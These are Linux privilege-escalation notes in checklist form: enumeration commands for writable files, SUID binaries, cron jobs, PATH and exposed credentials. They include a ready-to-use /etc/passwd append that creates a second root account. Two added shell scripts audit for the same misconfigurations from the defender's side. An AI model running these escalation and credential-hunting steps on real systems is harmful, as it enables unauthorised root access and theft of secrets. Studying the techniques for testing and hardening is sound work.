Linux Privesc Notes

Quick rundown on some easy wins for Linux privesc. Use LinPEAS in tandem to maximize potential for finding interesting things.

Are components exploitable?

Basic idea here is to check whether there are any application or kernel exploits you can take advantage of.

  • What is system version? Are there kernel exploits?
    • uname -a
    • cat /etc/issue
  • What's installed?
    • dpkg --list
      • note that this is every package and could take a while to go through...

Are permissions misconfigured?

Here the idea is to see if there's something you can write to that's run from an elevated context, like a cronjob, dependency, or to find an exploitable file permission via GTFOBins etc. In either case, you can often drop in a shell and get a win.

  • writable files or directories?
    • find / -writable -type d 2>/dev/null
    • find / -writable -type f 2>/dev/null
    • if /etc/passwd is writable, do this locally on the victim machine:
      • openssl passwd w00t
      • echo "root2:h842dpEP28MMA:0:0:root:/root:/bin/bash" >> /etc/passwd
  • Check for sudo -l
    • Can do GTFObins?
    • Need user password for this.
  • Check for SUID
    • find / -perm -u=s -type f 2>/dev/null
    • Is gtfobin'able?
  • Check for capabilities:
    • /usr/sbin/getcap -r / 2>/dev/null
    • Can do GTFObins?
  • Check cronjobs
    • ls -lah /etc/cron*
      • in CTFs and suchlike, something nonstandard in hourly is probably a good indicator that this is the way up.
    • running crons:
      • cat /var/log/cron.log
    • Writable cron binaries/scripts?
  • Check PATH
    • echo $PATH
      • writable directory in PATH? Think of it much like an unquoted service path: whatever can be dropped there gets run by whoever searches PATH.
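Added audit example, not from the original notes: a small POSIX sh script that checks for the misconfigurations above from the defender's side. It reports world-writable entries in a PATH-style string, extra UID-0 accounts in a passwd-format file (the footprint of the /etc/passwd append above), and world-writable files under the directories you hand it (cron directories, PATH entries). Function names and the sample input are assumptions constructed for this example; nothing here touches the real /etc/passwd or PATH.

```shell
#!/bin/sh
# Added audit helpers (example code, not from the original notes).

# Print each entry of a PATH-style string that is world-writable, plus empty
# entries (an empty entry means "current directory", which is almost as bad).
writable_path_dirs() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r d; do
        if [ -z "$d" ]; then
            printf '%s\n' '(empty PATH entry = current directory)'
            continue
        fi
        # -perm -o+w: all of the "other write" bits set, i.e. anyone can drop a file here
        [ -d "$d" ] && find "$d" -maxdepth 0 -type d -perm -o+w
    done
}

# Print any account in a passwd-format file with UID 0 that is not named root.
# A second UID-0 line is exactly what the /etc/passwd trick above leaves behind.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print world-writable regular files under the given directories, staying on
# one filesystem. Run it over /etc/cron* and the PATH entries on a real box.
world_writable_under() {
    find "$@" -xdev -type f -perm -o+w 2>/dev/null
}

# Demo on constructed input so it runs anywhere without reading the real system.
demo() {
    tmp=$(mktemp -d)
    mkdir "$tmp/bin_ok" "$tmp/bin_bad"
    chmod 755 "$tmp/bin_ok"
    chmod 777 "$tmp/bin_bad"          # constructed misconfiguration
    : > "$tmp/bin_bad/backup.sh"
    chmod 666 "$tmp/bin_bad/backup.sh" # constructed world-writable "cron script"
    # constructed passwd file with one planted UID-0 account
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'alice:x:1000:1000::/home/alice:/bin/bash' \
        'root2:x:0:0:root:/root:/bin/bash' > "$tmp/passwd"

    echo "world-writable PATH entries:"
    writable_path_dirs "$tmp/bin_ok:$tmp/bin_bad:"
    echo "extra UID-0 accounts:"
    extra_uid0_accounts "$tmp/passwd"
    echo "world-writable files:"
    world_writable_under "$tmp/bin_ok" "$tmp/bin_bad"
    rm -rf "$tmp"
}

demo
```

On a real host, feed writable_path_dirs the PATH that privileged jobs actually use (the PATH set in /etc/crontab or the root shell, not your own), and point world_writable_under at /etc/cron* and /etc/init.d. Any hit is a fix-now item: chmod the directory or file, and compare /etc/passwd against the last known-good copy rather than trusting the UID-0 check alone, since the planted account can also hide behind a normal UID with sudo rights.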

Is critical information exposed?

More or less, can you find creds stored in plaintext?

  • Is there interesting information in files?
    • find / -name "*.kdbx" -type f 2>/dev/null
      • quote the pattern so the shell doesn't expand it first; replace *.kdbx with other filetypes that might be interesting. Think about db configs, git repos, any source code/scripts that may authenticate to something, etc.
  • running processes?
    • ps aux
    • top -n 1
    • Any creds in command lines? e.g. a mysql -u root -p QwE123rfww -h 192.168.13.14 sort of situation.
  • Listening network connections?
    • netstat -tunlp
  • Check history; probably nothing, but do it anyway.
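Added detection example, not from the original notes: a POSIX sh filter that reads ps-style lines and flags the ones carrying a credential on the command line, the "mysql -p" situation above. The client list, the patterns and the sample ps output are constructed heuristics for this example, not a complete rule set; the password values in the sample are made up.

```shell
#!/bin/sh
# Added credential-on-command-line check (example code, not from the original notes).

# Read ps-style lines on stdin and print those that look like they carry a secret:
# a known database/SSH client followed by -p or --password, or a KEY=VALUE
# argument whose key contains pass/password/secret/token.
flag_cred_args() {
    grep -E -i -- \
        '(^|[[:space:]])(mysql|mariadb|psql|mongo|sshpass|smbclient)[[:space:]].*(-p|--password)|(pass(word)?|secret|token)=[^[:space:]]+'
}

# Constructed sample of "ps aux" output: two lines leak credentials, two do not.
# "mkdir -p" is there deliberately; -p alone is not enough to flag a line.
sample_ps_output() {
    printf '%s\n' \
        'root      1234  0.0  0.1  12345  1234 ?      S  10:00  0:00 /usr/sbin/cron' \
        'www-data  2222  0.0  0.2  54321  4321 ?      S  10:01  0:00 mysql -u root -pQwE123rfww -h 192.168.13.14 app' \
        'backup    3333  0.0  0.1  11111  2222 ?      S  10:02  0:00 sshpass -p Hunter2 rsync -a /srv backup@10.0.0.5:/mnt' \
        'alice     4444  0.0  0.1  22222  1111 pts/0  S  10:03  0:00 mkdir -p /tmp/work'
}

# Count of flagged lines, handy for a cron'd audit that alerts on anything non-zero.
flagged_count() {
    "$@" | flag_cred_args | wc -l | tr -d ' '
}

echo "flagged processes:"
sample_ps_output | flag_cred_args
echo "count: $(flagged_count sample_ps_output)"
```

On a live system pipe "ps axo user,pid,args" into flag_cred_args. Every hit is a credential to rotate and a job to rewrite so the secret comes from a config file with tight permissions or from the environment instead of argv. Mounting /proc with hidepid=2 stops unprivileged users from reading other users' command lines at all, which closes the "ps aux" path the note above relies on, though the secret is still exposed to anyone who shares the account.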